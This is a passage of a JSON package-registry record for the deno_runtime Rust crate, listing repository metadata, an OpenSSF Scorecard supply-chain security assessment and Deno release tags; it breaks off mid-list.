[{"id":1080037,"name":"deno_runtime","ecosystem":"cargo","description":"Provides the deno runtime library","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":272,"first_release_published_at":"2020-12-13T21:44:01.890Z","latest_release_published_at":"2026-08-27T15:22:24.849Z","latest_release_number":"0.266.0","last_synced_at":"2026-09-01T14:18:34.381Z","created_at":"2022-04-07T21:02:23.990Z","updated_at":"2026-09-01T19:17:48.495Z","registry_url":"https://crates.io/crates/deno_runtime/","install_command":"cargo install deno_runtime","documentation_url":"https://docs.rs/deno_runtime/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_